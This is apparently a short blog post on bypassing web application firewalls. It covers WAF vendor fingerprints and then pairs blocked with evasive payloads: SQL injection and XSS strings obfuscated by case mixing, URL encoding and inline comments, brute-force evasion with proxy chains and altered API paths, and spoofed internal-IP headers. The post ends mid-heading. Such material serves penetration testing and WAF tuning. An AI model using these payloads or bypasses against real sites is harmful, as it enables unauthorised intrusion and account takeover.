Unique WAF Bypassing Methods…!!!

4 min readMar 9, 2022

What is WAF…???

A web application firewall (WAF) is a firewall that monitors, filters, and blocks data packets as they travel to and from a website or web application.

A WAF can be either network-based, host-based, or cloud-based and is often deployed through a reverse proxy and placed in front of one or more websites or applications.

How does Actually WAF Works

A WAF analyzes Hypertext Transfer Protocol (HTTP) requests and applies a set of rules that define what parts of that conversation are benign and what parts are malicious. The main parts of HTTP conversations that a WAF analyzes are GET and POST requests. GET requests are used to retrieve data from the server, and POST requests are used to send data to a server to change its state.

The typical working style of WAF

Whitelisting, Blacklisting, Hybrid Security: Uses both the Above as rules.

Vendors for WAF:

AWS,Cloudflare,Akamai,Imperva,Verizon[EdgeCast],Sucuri and Many more

Responses Types to WAF:

AWS-WAF: awselb/2.0, AWSALB cookie values, Also sometimes with custom responses
CloudFront: Generated by CloudFront (CloudFront)
Cloudflare: CLOUDFLARE_ERROR_500S_BOX
Akamai: AkamaiGHost
Imperva: Powered By Incapsula
Sucuri: Sucuri, X-Sucuri-ID, Access Denied — Sucuri Website Firewall
Verizon[EdgeCast]: Please contact the site administrator, and provide the following Reference ID: EdgeCast Web Application Firewall (Verizon)
F5 ASM: The requested URL was rejected.
ModSecurity: This error was generated by Mod_Security
NetScaler: NS-Cache
Nexusguard: speresources.nexusguard.com/wafpage/index.html
Palo Alto: Palo Alto Next-Generation Security Platform text snippet.
SonicWall: This request is blocked by the SonicWALL.
Sophos : Powered by UTM Web Protection
ZenEdge: X-Zen-Fury header.

Few facts on WAF

WAF`s Use the common ports such as port no 80,443,8008,8080 and 8088.

WAF`s Creates its own cookies while in the session.

WAF`s shows its presence in the response headers.

WAF`s Does not give complete control over DOS, DDOS attacks.

WAF`s can respond with unique response codes such as Descriptive errors

WAF`s are easily identifiable from simple network mappers such as traceroute, Nmap, response headers, Curl, banners

Unique Methods to bypass WAF security

When you are on Login Page.

Blocked Reason:

If the Waf is Blocking you from an intruder. [Account lockout, Brute Forcing]

/v1/auth/login

Bypassing method:

Use random user-agents, ranging from Chrome Desktop to Phone browser.
use proxy chains, since chances are real that your IP gets blocked.
Use slight changes in Api path such as /v2/auth/login
Try with case sensitive`s at the paths such as /V1/auth/login

While checking for Sql Injection:

Blocked Reason

union select user, password from users

Bypassing methods

|| (select user from users where user_id = 1) = ‘admin’

While working on XSS:

Blocked reason:

<script>alert(1)</script>
SELECT * FROM all_tables WHERE OWNER = ‘DATABASE_NAME’

Bypassing method:

<ScRipT>alert()</sCRipT>
sELecT * FrOm all_tables whERe OWNER = ‘DATABASE_NAME’

While working on URL Encoding:

Encode normal payloads with % encoding/URL encoding.

Blocked Reason:

1. <svG/x=”>”/oNloaD=confirm()//
2. uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)

Bypassing Method:

1. %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
2. uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

While Checking with Comments:

Comments obfuscate standard payload vectors.

Blocked Reason:

1. <script>alert()</script>
2. /?id=1+union+select+1,2,3 —
3. <a href=javascript;alert()>ClickMe

Bypassing Method:

1. <! →<script>alert/**/()/**/</script>
2. /?id=1+un/**/ion+sel/**/ect+1,2,3 —
3. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

While working on Request Header Spoofing:

Our target is to fool the WAF/server into believing it was from their internal network. Adding some spoofed headers to represent the internal network, does the trick. With each request, some set of headers is to be added simultaneously thus spoofing the origin.

The upstream proxy/WAF misinterprets the request was from their internal network and lets our gory payload through.

Bypassing Method:

1. X-Originating-IP: 127.0.0.1
2. X-Forwarded-For: 127.0.0.1
3. X-Remote-IP: 127.0.0.1
4. X-Remote-Addr: 127.0.0.1
5. X-Client-IP: 127.0.0.1

While checking for Rate limit: